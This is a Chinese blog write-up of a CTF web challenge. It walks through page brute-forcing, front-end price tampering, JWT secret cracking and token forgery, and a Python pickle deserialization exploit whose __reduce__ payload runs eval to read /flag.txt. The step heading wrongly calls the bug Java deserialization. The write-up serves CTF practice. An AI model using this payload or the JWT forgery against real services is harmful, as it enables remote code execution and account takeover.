python安全开发——Web2 WriteUp反序列化漏洞

已于 2022-10-08 09:04:53 修改
阅读量466 收藏
点赞数
分类专栏: 靶场练习 文章标签: 安全 web安全 网络安全
于 2022-10-08 08:56:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/127198881
版权

考点:

  • 逻辑漏洞
  • JWT
  • 未授权访问
  • python 反序列化

1、爆破页号

 找page,使用sleep()函数是为了防止安全狗封IP

from time import sleep
import requests
url="http://62bdaa92-4bf8-4e64-9ea3-1fd715bcbf22.node4.buuoj.cn:81/shop?page="
for i in range(0,500):
    r=requests.get(url+str(i))
    sleep(0.4)
    if 'lv6.png' in r.text:
        print(i)
        pass

 访问181,创建了一个账号,查看余额,远远不够买 lv6

2、逻辑漏洞

 前端验证,F12修改打折的数目

 好家伙,垂直越权,找cookie

截屏没有截到关键地方,在控制台输入document.cookie()

3、JWT未授权访问

 JWT非常熟悉,上星期刚刚挖过它

 找密钥,正是刚才注册的 id,就想着这里能不能未授权登陆管理员账号。 爆破出 JWT 的 key 为 1Kun

 改JWT

 抓包修改JWT

4、Java反序列化

看源码,把它下载下来进行代码审计

 把状态码改一下,admin.py 存在反序列化pickle.loads(),看不懂代码的看这个Python的序列化与反序列化_51CTO博客_python序列化和反序列化

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

 附上 exp

import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print (a)

将生成的 payload 传给 become 传入服务器可成功回显 flag。

@Camelus
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
网络安全管理职业技能竞赛Web writeup1
08-03
网络安全管理职业技能竞赛Web writeup1 在本次网络安全管理职业技能竞赛Web writeup中,我们将探讨Web安全领域中的一个CTF挑战,涵盖了SQL注入、错误信息处理、Web应用安全等多个方面的知识点。 SQL注入 在本挑战...
网络安全管理职业技能竞赛Web writeup_合天网安学院-程序员宝宝 - 程序员宝宝1
08-03
SDL(Secure Development Life Cycle)是指在软件开发生命周期中的安全开发流程。SDL 旨在确保软件的安全性和可靠性,防止软件中的漏洞和风险。 OpenSSH 的基本概念 OpenSSH 是一种开源的远程登录工具,旨在提供一...
攻防世界--Web进阶--Web_python_template_injection---python模板注入---writeup
z2560088的博客
10-10 981
- 首先看到题目,就知道这道题是关于 **模板注入** 的,什么是模板注入呢? - 为了写 html 代码的时候方便,很多网站都会使用模板,先写好一个 html 模板文件, 比如: ```python def test(): code = request.args.get('id') html = ''' <h3>%s</h3> '''%(code) return render_template_string(html) ``` 这段代码中的 `h..
BUUCTF-web类-第二题 [强网杯 2019]随便注
weixin_44622228的博客
04-16 629
BUUCTF-web类-第二题 [强网杯 2019]随便注 正常输入1,返回一个数组 基本操作,单引号测试下,报错了。 看看 1’ or 1=1 #,发现爆出了所有字段。 常规流程,order by,发现到order by 3#时,报错了,说明该表中只有三个字段。 继续常规流程,联合查询,发现提示竟然过滤了这么多注入时常用的关键字,看来事情没有这么简单。 于是我选择了从头再来,看看有没有别的注...
Python序列漏洞及魔术方法详细全解(链构造、自动审计工具bandit)
ran的博客
04-17 2590
魔术方法执行调用下面的代码,如果下面的代码可控的话,就可能存在序列漏洞。pickle.dump(obj, file) :将对象序列后保存到文件。 pickle.load(file) :读取文件, 将文件中的序列内容序列为对象。 pickle.dumps(obj) :将对象序列成字符串格式的字节流。 pickle.loads(bytes_obj) :将字符串格式的字节流序列为对象。寻找LV6 -> 购买修改支付逻辑 -> 绕过admin限制需修改jwt值 -> 爆破jwt密匙 -> 重组jw
python框架及漏洞
小小猪的博客
08-17 830
Django框架及漏洞 python框架 Django框架介绍: Django也是一个MVC框架。但是在Django中,控制器接受用户输入的部分由框架自行处理,所以 Django 里更关注的是模型(Model)、模板(Template)和视图(Views)。 漏洞: 1. Django任意代码执行 2. Django重置密码漏洞 3. Django SQL注入漏洞 4. Django 目录遍历漏洞 5....
Python序列漏洞(入门)
xiaoheizi的博客
07-02 366
_reduce__()魔术方法,魔术方法中执行了传递的参数,参数意思是:执行调用计算器的系统命令。__reduce__()和__reduce_ex__()魔术方法:对象被序列时自动调用。__setstate__()魔术方法:对象被序列时自动调用。__getstate__()魔术方法: 对象被序列时自动调用。读取文件, 将文件中的序列内容序列为对象。安装后会在当前Python目录下script。将字符串格式的字节流序列为对象。安装后会在当前Python目录下。parseObject等。
2018全国大学生信息安全竞赛web题出题docker+writeup.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用...
0RAYS-祥云杯writeup .pdf
09-05
这篇writeup涉及的是一个网络安全竞赛,名为"0RAYS-祥云杯",主要涵盖了安全开发、业务安全、信息安全研究以及安全运营等领域的知识。在比赛中,参赛者需要解决一系列安全问题,包括Web Command命令执行和数据安全。...
DoraBox 漏洞练习平台WriteUP.pdf
04-14
DoraBox 漏洞练习平台 WriteUP与总结。SQLi 数字型,数字型注入拼接语句一般为 select * from <表名> where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为...
PyYaml序列漏洞详解
2302_76827504的博客
04-27 591
果listitems不为空,则调用instance的extend()方法,将listitems中的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法中,data是一个包含YAML格式字符串的变量,可以是从文件中读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
学好Python开发你一定会用到这30框架种
轻松学python的博客
11-07 989
现在Python成为了炽手可热的一门语言,在如何快速入门的同时,如何进行高效的开发是一门语言非常重要的优势。我们收集马哥Python了超过2000名学员的意见和建议,对Python常用的框架进行了梳理,这些框架包括事件I/O,OLAP,Web开发,高性能网络通信,测试,爬虫等。 Python目前主流的应用包括:Web开发、图形界面开发、系统网络运维、网络编程、科学数字计算、3D游戏开发,而我...
python pickle序列漏洞
weixin_43610673的博客
05-20 3015
前置知识 什么是pickle pickle是Python专用的一个进行序列序列的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列或者JSON,这些以键值对形式存储序列对象数据的不同,pickle 序列Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
【心得】Python序列漏洞个人笔记
最新发布
uuzeray的博客
12-27 302
python序列时,直接可以不需要恶意类,也不需要现有的魔术方法,直接产生类的定义并执行__reduce__方法。pickle 类无法序列 code类,为了弥补这个问题,2.6以后增加了marshal模块来处理。注意服务器是linux进行序列操作,我们也要在linux上进行序列操作,否则会报错。方括号被用于将命令字符串作为列表的单个元素,并将整个列表作为参数传递给。php序列时,只能控制类的属性,利用现有的魔术方法做跳板。序列字符串里面包含类的所有定义,包括类的方法。
Python】Pickle/PyTorch序列漏洞
兴趣使然的创作者
02-28 1268
一个漏洞
2021-7-30 [CISCN2019 华北赛区 Day1 Web2]ikun 知识点:逻辑漏洞,JWT伪造,python-pickle序列
m0_51326092的博客
08-03 607
文章目录前言前置知识一、JWT二、Python-pickle序列解题过程总结 前言 一开始看到kunkun,好家伙,做着做着发现这真是道难题,好你个姬霓太美,太菜了不得不去看大佬wp,才发现是我从未体验过得全新知识点,针不搓呢!!! 前置知识 参考大佬博客: https://www.cnblogs.com/Cl0ud/p/12177062.html 一、JWT JWT解码网站 Json Web Token详解 JWT破解工具 二、Python-pickle序列 解题过程 总结 ...
Python Web 框架 Django 修复SQL注入漏洞(CVE-2022-34265)
murphysec的博客
07-09 2010
Django 是一个由 Python 语言编写的开源 Web 应用框架,Github 上 star 为 64.9K。Python 开发者使用 Django 可以快速开发、设计和部署网站。7月4日,OSCS 监测到 Django 官方修复了一个 SQL 注入漏洞。如果 Trunc() 方法的 kind 参数和 Extract() 方法的 lookup_name 参数没有进行安全过滤,可能会造成 SQL 注入的风险,建议各位开发者关注。更多漏洞详细信息可进入 OSCS 社区查看:https://www.oscs
python安全之Pickle序列漏洞学习。
Mrs_H的博客
10-28 1956
前言 写这篇文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这篇文章主要还是通过我所遇到的pickle序列题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这篇文章之前,我想先贴出一位大佬的文章Pion1e
2017百越杯序列writeup
weixin_30865427的博客
08-19 449
去年的了,之前也有研究过。只是因为感觉PHP序列挺好玩的所以就再研究了一遍。总之感觉序列漏洞挺好玩的。 题目代码: 1 <?php 2 3 class home{ 4 5 private $method; 6 private $args; 7 function __construct($method, $...
"2021东华杯Web Writeup1:EzGadget序列漏洞分析
然而,这段代码存在严重的序列漏洞,攻击者可以构造恶意的序列数据,导致远程代码执行漏洞,甚至可能导致服务器被攻陷。 通过对这段代码的分析,可以看到序列漏洞的危害性。为了修复这个漏洞,可以考虑...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值